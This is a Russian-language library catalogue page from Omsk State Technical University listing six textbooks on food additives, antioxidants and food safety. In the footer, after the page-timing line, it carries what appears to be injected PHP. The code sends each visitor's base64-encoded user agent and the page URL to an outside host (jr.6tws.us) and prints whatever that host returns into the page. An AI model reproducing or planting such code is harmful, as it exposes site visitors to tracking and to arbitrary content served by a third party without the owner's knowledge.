Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

71 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Антиокислитель")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Печенежская И. А. Безопасность товаров. Ч. 1. Продовольственные товары [Текст] : Учеб. пособие для студ. высш. учеб. заведений / И. А. Печенежская, А. Ф. Шепелев, 2004. - 319 с.
Ключевые слова 
БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВ -- ВЕЩЕСТВА ВРЕДНЫЕ -- ЗАГРЯЗНЕНИЕ РАДИОАКТИВНОЕ -- ЗАГРЯЗНЕНИЕ ТОКСИЧЕСКОЕ -- ЗАГРЯЗНЕНИЕ ХИМИЧЕСКОЕ -- МИКОТОКСИНЫ -- ПЕСТИЦИДЫ -- Диоксин -- УГЛЕВОДОРОД ароматический -- ДОБАВКА ПИЩЕВАЯ -- КОНСЕРВАНТ ПИЩЕВОЙ -- АНТИОКИСЛИТЕЛЬ -- КИСЛОТА ПИЩЕВАЯ -- ЩЕЛОЧЬ -- КРАСИТЕЛЬ ПИЩЕВОЙ -- САХАРОЗАМЕНИТЕЛЬ -- Солезаменитель -- АРОМАТИЗАТОР -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- ЗНАК СООТВЕТСТВИЯ -- ЗАКЛЮЧЕНИЕ ГИГИЕНИЧЕСКОЕ -- Оценка продукции гигиеническая -- СЕРТИФИКАЦИЯ СИСТЕМ КАЧЕСТВА -- СЕРТИФИКАЦИЯ ПРОИЗВОДСТВ
Держатели документа (Информация об экземплярах) 
2. 
Пищевая химия [Текст] : учеб. для студентов высш. учеб. заведений / под ред. А. П. Нечаева, 2004. - 632 с.
Ключевые слова 
Химия пищевая -- ПИТАНИЕ ЧЕЛОВЕКА -- БЕЛКИ - ПИТАНИЕ -- АЛЛЕРГИЯ ПИЩЕВАЯ -- АМИНОКИСЛОТА -- пептиды - питание -- УГЛЕВОДЫ - ПИТАНИЕ -- УГЛЕВОДы - ХИМИЯ -- ПОЛИСАХАРИД -- Моносахарид -- КРАХМАЛ -- Гликоген -- ЦЕЛЛЮЛОЗА -- ПЕКТИН -- ЛИПИДЫ - Питание -- ЖИРЫ - ХИМИЯ -- ЖИРЫ - ПИТАНИЕ -- МИКРОЭЛЕМЕНТЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВИТАМИНЫ - ПИТАНИЕ -- КИСЛОТА ПИЩЕВАЯ - Питание -- ФЕРМЕНТЫ - ПИТАНИЕ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- КРАСИТЕЛЬ ПИЩЕВОЙ -- ЗАГУСТИТЕЛЬ -- ЭМУЛЬГАТОР -- АРОМАТИЗАТОР -- КОНСЕРВАНТ ПИЩЕВОЙ -- АНТИОКИСЛИТЕЛЬ -- ВОДА - ПИТАНИЕ -- Вода - химия -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ -- ТОКСИНЫ -- ФАЛЬСИФИКАЦИЯ ПРОДУКТОВ -- продукты генетически модифиц -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИЩЕВАРЕНИЕ -- РАЦИОН ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ
Держатели документа (Информация об экземплярах) 
3. 
Исупов В. П. Пищевые добавки и пряности [Текст] : История, состав и применение / В. П. Исупов, 2000. - 166,[3] с.
Оглавление 
  • СанПиН 2.3.2.560-96. Список пищевых добавок, разрешенных к применению при производстве пищевых продуктов. - с.150-167
Держатели документа (Информация об экземплярах) 
4. 
Пищевые добавки [Текст] : Энциклопедия / Авт.-сост. Л. А. Сарафанова, 2003. - 684 с.
Оглавление 
  • СанПин 2.3.2.1078-01. Пищевые добавки, не оказывающие вредного воздействия на здоровье человека при использовании для изготовлениия пищевых продуктов. - с.639-655
  • Об ароматических веществах, используемых в пищевых продуктах. - с.656-660
Держатели документа (Информация об экземплярах) 
5. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
6. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2876 - 25.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.89 с.12 запросов, 0.77c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;